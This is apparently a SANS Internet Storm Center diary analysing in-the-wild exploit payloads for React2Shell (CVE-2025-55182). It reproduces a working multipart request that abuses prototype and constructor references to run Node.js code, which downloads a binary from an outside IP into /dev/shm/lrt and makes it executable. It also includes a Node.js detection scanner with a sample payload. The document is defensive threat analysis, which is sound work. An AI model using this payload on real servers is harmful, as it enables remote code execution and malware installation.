More React2Shell Exploits CVE-2025-55182

    Published: 2025-12-15. Last Updated: 2025-12-15 13:17:34 UTC
    by Johannes Ullrich (Version: 1)

    Exploits for React2Shell (CVE-2025-55182) remain active. However, at this point, I would think that any servers vulnerable to the "plain" exploit attempts have already been exploited several times. Here is today's most popular exploit payload:

    ------WebKitFormBoundaryxtherespoopalloverme
    Content-Disposition: form-data; name="0"

    {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('http').get('http://51.81.104.115/nuts/poop',r=>r.pipe(process.mainModule.require('fs').createWriteStream('/dev/shm/lrt').on('finish',()=>process.mainModule.require('fs').chmodSync('/dev/shm/lrt',0o755))));","_formData":{"get":"$1:constructor:constructor"}}}
    ------WebKitFormBoundaryxtherespoopalloverme
    Content-Disposition: form-data; name="1"

    "$@0"
    ------WebKitFormBoundaryxtherespoopalloverme
    ------WebKitFormBoundaryxtherespoopalloverme--

    To make the key components more readable:

    process.mainModule.require('http').get('http://51.81.104.115/nuts/poop',
    r=>r.pipe(process.mainModule.require('fs').
    createWriteStream('/dev/shm/lrt').on('finish'

    This statement downloads the binary from 51.81.104.115 into a local file, /dev/shm/lrt.

    process.mainModule.require('fs').chmodSync('/dev/shm/lrt',0o755))));

    The downloaded file is then marked as executable. It is unclear whether it is explicitly executed afterwards. The VirusTotal summary is somewhat ambiguous regarding the binary, identifying it as either adware or a miner [1]. Currently, this is the most common exploit variant we see for react2shell.

    Other versions of the exploit use /dev/lrt and /tmp/lrt instead of /dev/shm/lrt to store the malware.

    /dev/shm and /tmp are typically world writable and should always work. Writing to /dev itself requires root privileges, and these days it is unlikely for a web application to run as root. One recommendation to harden Linux systems is to create /tmp as its own partition and mount it "noexec" to prevent it from being used as scratch space to run exploit code. But this is sometimes tough to implement, as "normal" processes occasionally run code from /tmp (not pretty, but done every so often).
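    As an added example (not code from the diary), here is a small Node.js scanner for the indicators walked through above: RSC reference strings pointing at __proto__ or constructor, process.mainModule.require inside _prefix, and the drop paths listed. The boundary handling and the sample bodies are constructed for this example; the download host is a documentation-range placeholder.

```javascript
// Added example: detect the React2Shell-style RSC payload shape in a raw
// multipart/form-data body (detection logic, not the diary's own code).
// Assumes the body is a string whose first line is the boundary.
const SUSPICIOUS_KEYS = ['__proto__', 'constructor'];
const DROP_PATHS = ['/dev/shm/lrt', '/tmp/lrt', '/dev/lrt']; // paths named in the diary

function parseMultipart(body) {
  const boundary = body.split(/\r?\n/)[0].trim();
  if (!boundary.startsWith('--')) return [];
  return body.split(boundary)
    .map((part) => part.replace(/^\r?\n/, ''))
    .filter((part) => part.includes('Content-Disposition'))
    .map((part) => {
      const [headers, ...rest] = part.split(/\r?\n\r?\n/);
      const name = (headers.match(/name="([^"]*)"/) || [])[1];
      return { name, value: rest.join('\n\n').trim() };
    });
}

// Walk a decoded form field (object, array or string) and collect indicators.
function findIndicators(value, path) {
  const hits = [];
  if (typeof value === 'string') {
    // RSC reference syntax such as "$1:__proto__:then" or "$1:constructor:constructor"
    if (/^\$\d+:/.test(value) && SUSPICIOUS_KEYS.some((k) => value.includes(':' + k))) {
      hits.push(`${path}: prototype/constructor reference ${value}`);
    }
    if (value.includes('process.mainModule.require')) hits.push(`${path}: process.mainModule.require`);
    for (const p of DROP_PATHS) if (value.includes(p)) hits.push(`${path}: drop path ${p}`);
    // The "value" field carries nested JSON as a string; descend into it too.
    if (value.startsWith('{')) {
      try { hits.push(...findIndicators(JSON.parse(value), path + '(json)')); } catch (e) { /* not JSON */ }
    }
  } else if (value && typeof value === 'object') {
    for (const [k, v] of Object.entries(value)) hits.push(...findIndicators(v, `${path}.${k}`));
  }
  return hits;
}

function scanBody(body) {
  const hits = [];
  for (const part of parseMultipart(body)) {
    let parsed;
    try { parsed = JSON.parse(part.value); } catch (e) { parsed = part.value; }
    hits.push(...findIndicators(parsed, `part[${part.name}]`));
  }
  return hits;
}

// Constructed sample mirroring the diary's payload (placeholder download host).
const B = '------WebKitFormBoundaryEXAMPLE';
const SAMPLE_BODY = [B, 'Content-Disposition: form-data; name="0"', '', JSON.stringify({
  then: '$1:__proto__:then', status: 'resolved_model', reason: -1, value: JSON.stringify({ then: '$B1337' }),
  _response: { _prefix: "process.mainModule.require('http').get('http://203.0.113.10/x',r=>r.pipe(process.mainModule.require('fs').createWriteStream('/dev/shm/lrt')))", _formData: { get: '$1:constructor:constructor' } },
}), B, 'Content-Disposition: form-data; name="1"', '', '"$@0"', B + '--'].join('\r\n');
const BENIGN_BODY = [B, 'Content-Disposition: form-data; name="0"', '', '{"id":42,"title":"hello"}', B + '--'].join('\r\n');
```

Running scanBody on the sample yields four findings (the __proto__ reference, process.mainModule.require, the /dev/shm/lrt drop path, and the constructor reference), while the benign body yields none.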

    [1] https://www.virustotal.com/gui/file/895f8dff9cd26424b691a401c92fa7745e693275c38caf6a6aff277eadf2a70b/detection

    --
    Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

    Keywords: react react2shell